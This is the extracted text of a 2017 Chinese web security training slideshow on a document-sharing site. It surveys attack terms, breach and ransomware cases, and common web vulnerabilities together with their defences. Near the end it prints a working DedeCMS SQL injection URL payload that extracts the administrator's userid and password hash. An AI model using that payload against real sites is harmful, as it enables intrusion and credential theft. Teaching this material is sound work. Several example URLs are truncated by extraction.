




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、Sept.,2017,安全知識培訓(xùn),安全常識,安全常識,什么是漏洞 安全漏洞是信息系統(tǒng)在生命周期的各個階段(設(shè)計、實現(xiàn)、運維等過程)中產(chǎn)生的某類問題,這些問題會對系統(tǒng)的安全(機密性、完整性、可用性)產(chǎn)生影響,漏洞與Bug并不等同,他們之間的關(guān)系基本可以描述為:大部分的Bug影響功能性,并不涉及安全性,也就不構(gòu)成漏洞;大部分的漏洞來源于Bug,但并不是全部,它們之間只是有一個很大的交集,安全常識,什么是攻擊 利用網(wǎng)絡(luò)存在的漏洞和安全缺陷對網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)進行的攻擊。包括主動攻擊:篡改、偽造消息數(shù)據(jù)和拒絕服務(wù)攻擊(DDOS)等,被動攻擊:流量分析、竊聽等 什么是入侵 網(wǎng)絡(luò)入侵(
2、hacking)通常是指具有熟練地編寫和調(diào)試計算機程序的技巧,并使用這些技巧來獲得非法或未授權(quán)的網(wǎng)絡(luò)或文件訪問,入侵進入公司內(nèi)部網(wǎng)的行為 區(qū)別 入侵是指任何威脅和破壞系統(tǒng)資源的行為,攻擊是入侵者為進行入侵所采取的技術(shù)手段和方法,安全術(shù)語,后門 繞過安全控制而獲取對程序或系統(tǒng)訪問權(quán)的方法。后門的最主要目的就是方便以后再次秘密進入或者控制系統(tǒng)。 webshell webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱作為一種網(wǎng)頁后門,安全術(shù)語,0day漏洞 通常是指還沒有補丁的漏洞。也就是說官方還沒有發(fā)現(xiàn)或者是發(fā)現(xiàn)了還沒有開發(fā)出安全補丁的漏洞 ex
3、ploit 簡稱exp,漏洞利用,安全術(shù)語,提權(quán) 提高自己在服務(wù)器中的權(quán)限,主要針對網(wǎng)站入侵過程中,當入侵某一網(wǎng)站時,通過各種漏洞提升WEBSHELL權(quán)限以奪得該服務(wù)器權(quán)限。 跳板 跳板,簡單來說,就是為了隱藏自己的地址,讓別人無法查找到自己的位置,安全術(shù)語,拖庫 網(wǎng)站遭到入侵后,黑客竊取其數(shù)據(jù)庫。 社會工程學(xué) 一種通過對受害者心理弱點、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進行諸如欺騙、傷害等危害手段取得自身利益的手法,已成迅速上升甚至濫用的趨勢。 Apt攻擊 高級持續(xù)性威脅。 利用先進的攻擊手段對特定目標進行長期持續(xù)性網(wǎng)絡(luò)攻擊的攻擊形式,安全事件舉例,信息泄露事件 1、快遞公司官網(wǎng)遭入侵
4、泄露1400萬用戶快遞數(shù)據(jù)2014年8月12日,警方破獲了一起信息泄露案件,犯罪嫌疑人通過快遞公司官網(wǎng)漏洞,登錄網(wǎng)站后臺,然后再通過上傳(后門)工具就能獲取該網(wǎng)站數(shù)據(jù)庫的訪問權(quán)限,獲取了1400萬條用戶信息,除了有快遞編碼外,還詳細記錄著收貨和發(fā)貨雙方的姓名、電話號碼、住址等個人隱私信息。 2、機鋒網(wǎng)2700萬用戶數(shù)據(jù)泄露2015年1月5日上午,知名微博賬號“互聯(lián)網(wǎng)的那點事”發(fā)布消息稱,機鋒論壇2300萬用戶數(shù)據(jù)泄露,包含用戶名、郵箱、加密密碼在內(nèi)的用戶信息在網(wǎng)上瘋傳,提醒用戶抓緊修改密碼,安全事件舉例,信息泄露事件 3、小米800萬用戶數(shù)據(jù)泄露 4、130萬考研用戶信息被泄露5、智聯(lián)招聘86
5、萬條求職簡歷數(shù)據(jù)遭泄露6、12306網(wǎng)站超13萬用戶數(shù)據(jù)遭泄露7、漢庭2000萬開房記錄遭泄露,安全事件舉例,信息泄露事件,安全事件舉例,DDOS 2017年1月至6月,游戲行業(yè)大于300G以上的攻擊超過1800次,最大峰值為608G;游戲公司每月平均被攻擊次數(shù)為800余次。在2017年1月至3月為攻擊最猖獗的時期,平均每天有30多次攻擊。 而在攻擊源方面,94%的攻擊源都位于國內(nèi),6%的攻擊源來自國外,安全事件舉例,病毒木馬事件 Wannacry WannaCry(又叫Wanna Decryptor),一種“蠕蟲式”的勒索病毒軟件,由不法分子利用NSA(National Security A
6、gency,美國國家安全局)泄露的危險漏洞“EternalBlue”(永恒之藍)進行傳播。最新統(tǒng)計數(shù)據(jù)顯示,100多個國家和地區(qū)超過10萬臺電腦遭到了勒索病毒攻擊、感染。 勒索病毒是自熊貓燒香以來影響力最大的病毒之一。WannaCry勒索病毒全球大爆發(fā),至少150個國家、30萬名用戶中招,造成損失達80億美元,已經(jīng)影響到金融,能源,醫(yī)療等眾多行業(yè),造成嚴重的危機管理問題。中國部分Windows操作系統(tǒng)用戶遭受感染,校園網(wǎng)用戶首當其沖,受害嚴重,大量實驗室數(shù)據(jù)和畢業(yè)設(shè)計被鎖定加密。部分大型企業(yè)的應(yīng)用系統(tǒng)和數(shù)據(jù)庫文件被加密后,無法正常工作,影響巨大,安全事件舉例,病毒木馬事件 Petya Pety
7、a是2017年3月出現(xiàn)的一種變體勒索軟件,是一種類似于“WannaCry”的新勒索病毒,它的破壞性比傳統(tǒng)的勒索軟件更大,現(xiàn)已導(dǎo)致俄羅斯石油公司(RosneftPJSC)和丹麥A.P.穆勒-馬士基有限公司等在內(nèi)的多家大型企業(yè)被攻擊,而且烏克蘭的政府系統(tǒng)也遭到了該病毒的襲擊。并已確認有國內(nèi)企業(yè)中招。騰訊電腦管家稱已確認病毒樣本通過永恒之藍漏洞傳播。 北京時間2017年6月27日晚,烏克蘭、俄羅斯、印度、西班牙、法國、英國以及歐洲多國正在遭遇Petya類勒索病毒襲擊,政府、銀行、電力系統(tǒng)、通訊系統(tǒng)、企業(yè)以及機場都不同程度地受到了影響,安全事件舉例,病毒木馬事件 暗云III “暗云”是目前已知復(fù)雜度最
8、高、感染用戶數(shù)量最大的木馬之一。通過復(fù)雜、新穎的技術(shù),“暗云”可長期潛伏在用戶的計算機系統(tǒng)中。中毒用戶會成為受控“肉雞”,作為DDoS網(wǎng)絡(luò)攻擊的源頭,并導(dǎo)致網(wǎng)絡(luò)變卡、用戶信息被竊取等安全問題。有全網(wǎng)普查顯示,該木馬已感染了數(shù)以百萬的計算機,Web構(gòu)成,web應(yīng)用工作原理,靜態(tài)網(wǎng)頁: html或者htm,是一種靜態(tài)的頁面格式,不需要服務(wù)器解析其中的腳本。由瀏覽器如(IE、Chrome等)解析。 1.不依賴數(shù)據(jù)庫 2.靈活性差,制作、更新、維護麻煩 3.交互性交差,在功能方面有較大的限制 4.安全,不存在SQL注入漏洞 動態(tài)網(wǎng)頁: asp、aspx、php、jsp等,由相應(yīng)的腳本引擎來解釋執(zhí)行,根
9、據(jù)指令生成靜態(tài)網(wǎng)頁。 1.依賴數(shù)據(jù)庫 2.靈活性好,維護簡便 3.交互性好,功能強大 4.存在安全風險,可能存在SQL注入漏洞,web應(yīng)用工作原理,正常用戶訪問網(wǎng)頁的具體流程如下圖,漏洞利用流程,黑客攻擊網(wǎng)站(sql注入)的具體流程如下圖,服務(wù)器,Windows 代表:Windows2003、Windows2008、 常見漏洞:“永恒之藍”(MS17-010),MS08-067(比較古老但很經(jīng)典的漏洞) Linux 代表Ubuntu、Centos、Redhat 常見漏洞:臟牛漏洞、sudo漏洞,web服務(wù)器,Web 服務(wù)器也稱為 HTTP 服務(wù)器,它是響應(yīng)來自瀏覽器的HTTP請求,并且發(fā)送出網(wǎng)
10、頁文件的軟件。 當訪問者在瀏覽器的地址文本框中輸入一個 URL,或者單擊在瀏覽器中打開的 網(wǎng)頁上的某個鏈接時,便生成一個網(wǎng)頁請求。 常見的web服務(wù)器:IIS、Apache、Nginx、tomcat、weblogic,web服務(wù)器,IIS IIS(Internet 信息服務(wù)器)是Internet Information Services的縮寫,是微軟提供的Internet服務(wù)器軟件,包括WEB、FTP、SMTP等服務(wù)器組件。 常見漏洞:IIS短文件泄露、IIS解析漏洞、IIS6.0遠程代碼執(zhí)行 Apache Apache是Apache軟件基金會的一個開放源碼的網(wǎng)頁服務(wù)器,世界使用排名第一的We
11、b服務(wù)器軟件 常見漏洞:apache解析漏洞、Apache日志文件漏洞,web服務(wù)器,Nginx Nginx是一個高性能的HTTP和反向代理服務(wù)器,也是一個IMAP/POP3/SMTP服務(wù)器。 常見漏洞:Nginx解析漏洞、整數(shù)溢出漏洞 Tomcat Tomcat 服務(wù)器是一個免費的開放源代碼的Web 應(yīng)用服務(wù)器,屬于輕量級應(yīng)用服務(wù)器,在中小型系統(tǒng)和并發(fā)訪問用戶不是很多的場合下被普遍使用,是開發(fā)和調(diào)試JSP 程序的首選。 常見漏洞:tomcat弱口令、tomcat遠程代碼執(zhí)行、本地提權(quán),web服務(wù)器,Weblogic Weblogic是一個基于JAVAEE架構(gòu)的中間件,WebLogic是用于開
12、發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫應(yīng)用的Java應(yīng)用服務(wù)器。 常見漏洞:java反序列化、SSRF(服務(wù)器端請求偽造,數(shù)據(jù)庫,數(shù)據(jù)庫 數(shù)據(jù)庫是按照數(shù)據(jù)結(jié)構(gòu)來組織、存儲和管理數(shù)據(jù)的“倉庫”。 結(jié)構(gòu)化查詢語言 結(jié)構(gòu)化查詢語言(Structured Query Language)簡稱SQL,結(jié)構(gòu)化查詢語言是一種數(shù)據(jù)庫查詢和程序設(shè)計語言,用于存取數(shù)據(jù)以及查詢、更新和管理關(guān)系數(shù)據(jù)庫系統(tǒng)。 數(shù)據(jù)庫分類 MySQL、MSSQL、Access、Oracle、Sqlite 數(shù)據(jù)庫管理軟件 Phpmyadmin、navicat,開發(fā)語言及常見框架/cms,PHP 開發(fā)框架:CodeIgni
13、ter、ThinkPHP cms(內(nèi)容管理系統(tǒng)):phpcms、dedecms、qibocms. ASP cms:aspcms、動易cms、南方數(shù)據(jù). .NET cms:SiteServer JSP 開發(fā)框架:struts2、Spring MVC cms:jeecms、大漢cms,web常見架構(gòu),LAMP Linux+Apache+MySQL+PHP 適用于大型網(wǎng)站架構(gòu),穩(wěn)定性高,常見于企業(yè)網(wǎng)站 WAMP Windows+Apache+MySQL+PHP 適用于中小型網(wǎng)站架構(gòu),易于管理,常見于教育(大學(xué)等)、政府事業(yè)單位(常用phpcms作為網(wǎng)站cms,web常見架構(gòu),其他常見組合: PHP+
14、IIS(IIS常和asp和aspx搭配) 部分網(wǎng)站可能會使用這種架構(gòu),但是偏少 ASP+IIS 常見于學(xué)校,政府(地方)等單位 .NET+IIS(aspx) 常見于學(xué)校(比如正方教務(wù)系統(tǒng)),政府,醫(yī)院等,部分企業(yè)網(wǎng)站也會使用這種架構(gòu) JSP+Tomcat 金融、政府(大型,一般市級以上會是jsp的),大學(xué)主站,常見漏洞,常見漏洞,SQL注入危害,這些危害包括但不局限于: 數(shù)據(jù)庫信息泄漏:數(shù)據(jù)庫中存放的用戶的隱私信息的泄露。 網(wǎng)頁篡改:通過操作數(shù)據(jù)庫對特定網(wǎng)頁進行篡改。 網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫一些字段的值,嵌入網(wǎng)馬鏈接,進行掛馬攻擊。 數(shù)據(jù)庫被惡意操作:數(shù)據(jù)庫服務(wù)器被攻擊,數(shù)據(jù)庫的
15、系統(tǒng)管理員帳戶被竄改。 服務(wù)器被遠程控制,被安裝后門。經(jīng)由數(shù)據(jù)庫服務(wù)器提供的操作系統(tǒng)支持,讓黑客得以修改或控制操作系統(tǒng)。 破壞硬盤數(shù)據(jù),癱瘓全系統(tǒng)。 一些類型的數(shù)據(jù)庫系統(tǒng)能夠讓SQL指令操作文件系統(tǒng),這使得SQL注入的危害被進一步放大,SQL注入,sql注入攻擊漏洞,攻擊者把不可信的數(shù)據(jù)作為命令或者查詢語句的一部分,發(fā)送給解釋器的,以執(zhí)行計劃外的命令或者在未被恰當授權(quán)時訪問數(shù)據(jù),舉個例子: 網(wǎng)站后臺代碼的sql語句構(gòu)建如下 $sql=“select * from user where id=$id” 正常的url如下 http:/ 訪問該url會出現(xiàn)id=1的正常頁面 若是訪問 http:/
16、and 1=1 后臺語句構(gòu)建如下 select * from user where id=1 and 1=1 會返回和id=1一樣的回顯信息。 若是訪問 http:/ and 1=2 后臺語句構(gòu)建如下 select * from user where id=1 and 1=2 會返回和id=1不一樣的回顯信息 and 1=1 和 and 1=2 都是注入的sql語句,將其換成特定語句會導(dǎo)致攻擊者執(zhí)行任意sql語句,SQL注入直觀效果,Sqlmap SQL注入爆出數(shù)據(jù)庫表名,SQL注入的防御,過濾特殊字符: 單引號、雙引號、斜杠、反斜杠、冒號、空字符等的字符 過濾的對象: 用戶的輸入 提交的UR
17、L請求中的參數(shù)部分 從cookie中得到的數(shù)據(jù) 部署防SQL注入系統(tǒng)或腳本,跨站腳本(XSS)的危害,網(wǎng)絡(luò)釣魚,包括盜取各類用戶賬號 竊取用戶cookie資料,從而獲取用戶隱私信息,或利用用戶身份進一步對網(wǎng)站執(zhí)行操作 劫持用戶(瀏覽器)會話,從而執(zhí)行任意操作,例如進行非法轉(zhuǎn)賬,強制發(fā)表日志,發(fā)送電子郵件等 強制彈出廣告頁面,刷流量等 網(wǎng)頁掛馬 進行惡意操作,例如任意篡改頁面信息,刪除文章等 進行大量的客戶端攻擊,如DDOS攻擊 獲取客戶端信息,例如用戶的瀏覽歷史,真實ip,開放端口等 控制受害者機器向其他網(wǎng)站發(fā)起攻擊 結(jié)合其他漏洞進一步擴大攻擊 提升用戶權(quán)限,包括進一步滲透網(wǎng)站 傳播XSS跨站
18、腳本蠕蟲等,跨站腳本(XSS,當應(yīng)用程序收到含有不可信的數(shù)據(jù),在沒有進行適當?shù)尿炞C和轉(zhuǎn)義的情況下,就將它發(fā)送給一個網(wǎng)頁瀏覽器,這就會產(chǎn)生跨站腳本攻擊(簡稱XSS,舉個例子 后臺代碼如下 : 訪問正常url如下 http:/ 回顯就是123 若是訪問 http:/ 回顯的頁面就會執(zhí)行插入的JS代碼,發(fā)生彈窗。 如果把http:/ 這個鏈接發(fā)送給受害者并且引誘其點擊,受害者的瀏覽器將會彈窗。 總結(jié):XSS漏洞就是讓攻擊者能夠在受害者的瀏覽器上執(zhí)行任意的JS代碼,跨站腳本(XSS)直觀效果,通過xss漏洞劫持cookie,劫持后臺會話,跨站腳本(XSS)的防御,輸入與輸出中的過濾 黑名單與白名單 W
19、EB安全編碼規(guī)范 HttpOnly cookie,WEBSHELL,webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門。黑客在入侵了一個網(wǎng)站后,通常會上傳webshell,得到一個命令執(zhí)行環(huán)境,以達到控制網(wǎng)站服務(wù)器的目的,WEBSHELL的危害: 拿到了網(wǎng)站的WebShell,就可以修改網(wǎng)站的文件了!比如下載文件,修改文件,刪除文件等,將變得非常容易。 拿到WebShell權(quán)限后,如果磁盤做了安全設(shè)置以及站點獨立權(quán)限設(shè)置,則這個WebShell可能只能對當前站點有效,無法操作其他網(wǎng)站的程序。如果入侵者通過執(zhí)行命令,提升網(wǎng)站的
20、權(quán)限后,就可以發(fā)展到入侵服務(wù)器,進而創(chuàng)建管理用戶,達到控制整臺服務(wù)器的目的,WEBSHELL,一句話webshell,大馬webshell,跨站請求偽造(CSRF,跨站請求偽造,也叫CSRF。該攻擊讓登錄用戶的瀏覽器將偽造的HTTP請求,包括該用戶的會話cookie和其他認證信息,發(fā)送到一個存在CSRF漏洞的web應(yīng)用程序,該web程序?qū)占@些請求,下面將演示通過CSRF漏洞在用戶不知情的情況下修改用戶的密碼的例子,也可以這么理解CSRF攻擊:攻擊者盜用了你的身份,以你的名義進行某些非法操作。CSRF能夠使用你的賬戶發(fā)送郵件,獲取你的敏感信息,甚至盜走你的財產(chǎn)等,CSRF攻擊原理概要,We
21、b A 為存在CSRF漏洞 Web B 為攻擊者的惡意網(wǎng)站 User C 為Web A的用戶 正常情況下: A網(wǎng)站修改密碼的請求是 http:/,1. 用戶C打開瀏覽器,訪問受信任網(wǎng)站A,輸入用戶名和密碼請求登錄網(wǎng)站A; 2. 在用戶信息通過驗證后,網(wǎng)站A產(chǎn)生Cookie信息并返回給瀏覽器,此時用戶登錄網(wǎng)站A成功; 3. 用戶未退出網(wǎng)站A的情況下,在同一瀏覽器中訪問網(wǎng)站B; 4. 網(wǎng)站B中的js代碼要求瀏覽器對A網(wǎng)站發(fā)起一個http:/ 5. A網(wǎng)站信息信任從網(wǎng)站b發(fā)來的請求,認為是用戶的合法請求,用戶密碼被修改為newpass,提交該請求后,密碼修改為newpass,CSRF的防御,驗證HT
22、TP Referer字段 Token驗證 添加驗證碼,系統(tǒng)命令注入的危害,導(dǎo)致攻擊者執(zhí)行任意系統(tǒng)命令,控制主機權(quán)限,注入系統(tǒng)命令查看系統(tǒng)用戶,系統(tǒng)命令注入,系統(tǒng)命令注入和sql注入類似。 不同點是sql注入注入的是sql語句,系統(tǒng)命令注入注入的是系統(tǒng)命令。 前者導(dǎo)致執(zhí)行任意sql語句,后者導(dǎo)致執(zhí)行任意系統(tǒng)命令,舉個例子 后臺代碼如下 正常請求 http:/ 執(zhí)行的命令是 ping 倘若請求 http:/ ,目錄遍歷,目錄遍歷是Http所存在的一個安全漏洞,它使得攻擊者能夠訪問受限制的目錄,目錄遍歷的形成原因一般是http服務(wù)器的錯誤配置導(dǎo)致的,危害: 1:讀取敏感配置文件信息。(數(shù)據(jù)庫文件等)
23、 2:可能造成源碼文件泄露(一些管理員可能整站打包成zip,目錄遍歷,防御方法: 正確配置服務(wù)器,對目錄做訪問控制,信息泄露攻擊,信息泄露通常是由于服務(wù)器配置不當,或者是web應(yīng)用程序編寫不當,導(dǎo)致的泄露敏感信息。通常,掃描器可以輕易掃描出信息泄露,Svn源碼泄露,Phpinfo信息泄露,越權(quán),越權(quán)漏洞是邏輯漏洞的一種。 它使用戶能執(zhí)行一些本不該屬于自己的操作權(quán)限。 邏輯漏洞不像SQL注入,XSS跨站腳本等漏洞有明顯的標識,自動化掃描器可以針對規(guī)則來識別出這些漏洞,而邏輯漏洞一般出現(xiàn)在功能(業(yè)務(wù)流程)上,因此這是漏洞掃描工具無法去識別的,越權(quán)一般可以分為以下兩種。 水平越權(quán):相同級別用戶之前的
24、越權(quán)操作(例如查看其它用戶賬單) 垂直越權(quán):不同級別之間或不同角色之間的越權(quán)操作(user權(quán)限越權(quán)admin權(quán)限,舉個水平越權(quán)的例子,越權(quán)實例,這是某系統(tǒng)的一處越權(quán)實例。url格式如下 http:/ 修改Id參數(shù),可以直接查看他人發(fā)票/身份證 信息。(邏輯上本不允許) 那么遍歷這些Id,就可以收集很多敏感的信息,越權(quán)的防御,完善代碼邏輯: 1 結(jié)合session認證,當用戶發(fā)起對一個數(shù)據(jù)資源的請求時,根據(jù)session中的用戶id聯(lián)合查詢,倘若這個資源不屬于這個用戶,則不予查詢。 2 針對水平越權(quán),可以增加資源唯一標識符的復(fù)雜度,可以將其變成幾十位無規(guī)律的字符串,增加水平越權(quán)的難度。但是該方法
25、理論上仍然能被暴力破解,常見0day攻擊,什么是0day,0day漏洞 通常是指還沒有補丁的漏洞。也就是說官方還沒有發(fā)現(xiàn)或者是發(fā)現(xiàn)了還沒有開發(fā)出安全補丁的漏洞 0day攻擊 利用0day漏洞進行的攻擊,特點是利用簡單,危害較大,常見0day struts2,Struts2框架存在漏洞,平時說的存在struts2漏洞是指的遠程命令/代碼執(zhí)行漏洞 影響范圍 2017年3月份報告,常見0day struts2,Struts2漏洞有很多,比較著名的幾個遠程命令/代碼執(zhí)行漏洞,常見0day struts2,利用該漏洞可執(zhí)行任意操作,例如上傳shell,添加管理員賬號等,下圖我們展示的是查詢os版本信息,
26、以證明漏洞存在,常見0day java反序列化,Java序列化 把Java對象轉(zhuǎn)換為字節(jié)序列的過程便于保存在內(nèi)存、文件、數(shù)據(jù)庫中,ObjectOutputStream類的writeObject()方法可以實現(xiàn)序列化。 Java反序列化 把字節(jié)序列恢復(fù)為Java對象的過程,ObjectInputStream類的readObject()方法用于反序列化。 影響范圍 WebLogic、WebSphere、JBoss、Jenkins、OpenNMS這些大名鼎鼎的Java應(yīng)用,都受到影響 危害 導(dǎo)致遠程代碼執(zhí)行,獲取服務(wù)器權(quán)限,常見0day java反序列化,直接部署一個webshell,利用非常簡單,
27、常見0day bash破殼漏洞,Bash漏洞 bash漏洞源于在調(diào)用Bash Shell之前可以用構(gòu)造的值創(chuàng)建環(huán)境變量。由于沒有對輸入的環(huán)境變量進行檢測,攻擊者可以在輸入的變量時候可以包含惡意代碼,在Shell被調(diào)用后會被立即執(zhí)行。 影響范圍 影響目前主流的操作系統(tǒng)平臺,包括但不限于Redhat、CentOS、Ubuntu、 Debian、Fedora 、Amazon Linux 、OS X 10.10等平臺 危害 黑客利用該漏洞,可以執(zhí)行任意代碼,甚至可以不需要經(jīng)過認證,就能遠程取得系統(tǒng)的控制權(quán),包括執(zhí)行惡意程序,或在系統(tǒng)內(nèi)植入木馬,或獲取敏感信息,常見0day 心臟滴血漏洞,心臟滴血漏洞(
28、OpenSSL心臟滴血漏洞) 未能正確檢測用戶輸入?yún)?shù)的長度,攻擊者可以利用該漏洞,遠程讀取存在漏洞版本的OpenSSL服務(wù)器內(nèi)存中64K的數(shù)據(jù),獲取內(nèi)存中的用戶名、密碼、個人相關(guān)信息以及服務(wù)器的證書等私密信息。 影響范圍 該漏洞披露時,約有17%(大約五十萬)通過認證機構(gòu)認證的互聯(lián)網(wǎng)安全網(wǎng)絡(luò)服務(wù)器容易受到攻擊 危害 通過多個測試實例表明,根據(jù)對應(yīng)OpenSSL服務(wù)器承載業(yè)務(wù)類型,攻擊者一般可獲得用戶X.509證書私鑰、實時連接的用戶賬號密碼、會話 Cookies等敏感信息,進一步可直接取得相關(guān)用戶權(quán)限,竊取私密數(shù)據(jù)或執(zhí)行非授權(quán)操作,常見0day 永恒之藍,永恒之藍(英語:EternalBlu
29、e) 美國國家安全局(NSA)開發(fā)的漏洞利用程序,于2017年4月14日被黑客組織影子掮客泄漏。Wannacry傳播利用的是windows的smb漏洞,漏洞補丁是MS17-010 影響范圍 大多數(shù)windows系統(tǒng)都受到影響(已有相關(guān)補?。?危害 獲取服務(wù)器權(quán)限,常見0day samba漏洞,linux版“永恒之藍”,CVE-2017-7494 差異 Windows的SMB服務(wù)默認開啟,Samba在大多數(shù)的Linux發(fā)行版中需要手動開啟 影響范圍 漏洞影響Samba3.5.0及3.5.0和4.6.4之間的任意版本(不包括4.5.10、4.4.14、4.6.4)。 危害 可直接獲取服務(wù)器shel
30、l,常見0day samba漏洞,如圖,該漏洞利用模塊已集成到了metasploit當中,無需交互即可利用,該圖片展示的是已獲取到服務(wù)器shell,可以對服務(wù)器進行任何操作,常見0day dedecms,Dedecms,織夢內(nèi)容管理系統(tǒng) recommend.php存在sql注入 利用EXP:http:/url/plus/recommend.php?action=&aid=1&_FILEStypetmp_name=%27%20or%20mid=%27%20/*!50000union*/*!50000select*/1,2,3,(select%20CONCAT(0 x7c,userid,0 x7c,pwd)+from+%23_admin%20limit+0,1),5,6,7,8,9%23&_FILEStypename=1.jpg&_FILEStypetype=application/octet-stream&_FILE
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- T-ZSA 232-2024 特種巡邏機器人通.用技術(shù)要求
- T-ZJHQ 0003-2024 高等學(xué)校生活垃圾分類工作規(guī)范
- 2025年度電子商務(wù)平臺數(shù)據(jù)分析與報告合同模板
- 二零二五年度解除婚約合同范本:婚約解除后的財產(chǎn)清算、債務(wù)處理及子女監(jiān)護協(xié)議
- 2025年度鋼板租賃與回收利用合同
- 二零二五年度金融機構(gòu)資金轉(zhuǎn)入風險管理合同
- 2025年度智慧能源管理系統(tǒng)擔保人履約保證合同
- 二零二五年度企業(yè)綠色金融項目補貼協(xié)議
- 二零二五年度情人協(xié)議書:浪漫愛情生活規(guī)劃合同范本
- 石壕吏:歷史背景與社會問題分析教學(xué)教案
- 2025中鐵集裝箱運輸有限責任公司招聘46人(京外地區(qū)崗位)筆試參考題庫附帶答案詳解
- 中國農(nóng)業(yè)大學(xué)人文與發(fā)展學(xué)院管理服務(wù)崗位招聘筆試真題2023
- 2023-2024 中國滑雪產(chǎn)業(yè)白皮書
- 風電場觸電急救培訓(xùn)課件
- 二年級下冊數(shù)學(xué)課件-1.3 分草莓 北師大版(共14張PPT)
- 2022年中小學(xué)心理健康教育指導(dǎo)綱要
- 中國紅十字會救護員培訓(xùn)理論考試試卷 (1)附答案
- 高架橋梁混凝土工程專項施工方案
- 銀行案件風險排查實施細則
- 亞馬遜品牌授權(quán)書(英文模板)
- 10級空乘《形體訓(xùn)練3》課程標準(共14頁)
評論
0/150
提交評論